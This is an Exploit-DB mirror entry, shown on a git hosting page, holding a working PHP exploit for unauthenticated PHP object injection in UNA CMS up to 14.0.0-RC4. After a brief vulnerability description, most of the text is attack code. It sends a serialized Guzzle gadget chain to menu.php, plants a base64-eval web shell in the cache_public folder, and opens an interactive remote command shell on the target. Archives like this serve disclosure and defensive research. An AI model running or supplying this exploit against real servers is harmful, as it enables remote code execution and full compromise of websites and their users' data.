bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52139.txt
Exploit-DB 2bc15f74f8 DB: 2025-04-09 
9 changes to exploits/shellcodes/ghdb

InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation

Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)

GeoVision GV-ASManager 6.1.0.0  - Information Disclosure

Jasmin Ransomware - Arbitrary File Download (Authenticated)

jQuery 3.3.1 - Prototype Pollution & XSS Exploit

Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)

UNA CMS 14.0.0-RC - PHP Object Injection

WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation
2025-04-09 00:16:23 +00:00

125 lines
No EOL
4.6 KiB
Text
Raw Permalink Blame History

# Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
# Author: Egidio Romano aka EgiX
# Software link.......: https://unacms.com
[-] Software Links:
https://unacms.com
https://github.com/unacms/una
[-] Affected Versions:
All versions from 9.0.0-RC1 to 14.0.0-RC4.
[-] Vulnerability Description:
The vulnerability is located in the
/template/scripts/BxBaseMenuSetAclLevel.php script. Specifically,
within the BxBaseMenuSetAclLevel::getCode() method. When calling this
method, user input passed through the "profile_id" POST parameter is
not properly sanitized before being used in a call to the
unserialize() PHP function. This can be exploited by remote,
unauthenticated attackers to inject arbitrary PHP objects into the
application scope, allowing them to perform a variety of attacks, such
as writing and executing arbitrary PHP code.
<?php
/*
------------------------------------------------------------------------------------
UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
------------------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://unacms.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerability Description:
The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this
method, user input passed through the "profile_id" POST parameter is not properly
sanitized before being used in a call to the unserialize() PHP function. This can be
exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into
the application scope, allowing them to perform a variety of attacks, such as
writing and executing arbitrary PHP code.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2025-01
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+------------------------------------------------------------+";
print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/una/";
print "\nExample....: php $argv[0] https://unacms.com/\n\n";
die();
}
define('ON_APACHE', true);
define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');
class GuzzleHttp_Cookie_SetCookie
{
private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
}
class GuzzleHttp_Cookie_FileCookieJar
{
private $cookies, $filename = SH_PATH, $storeSessionCookies = true;
function __construct()
{
$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
}
}
$url = $argv[1];
$ch = curl_init();
$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);
curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));
print "\n[+] Performing PHP Object Injection";
curl_exec($ch); curl_close($ch);
print "\n[+] Launching shell\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";
while(1)
{
print "\nuna-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}
Reference in a new issue View git blame Copy permalink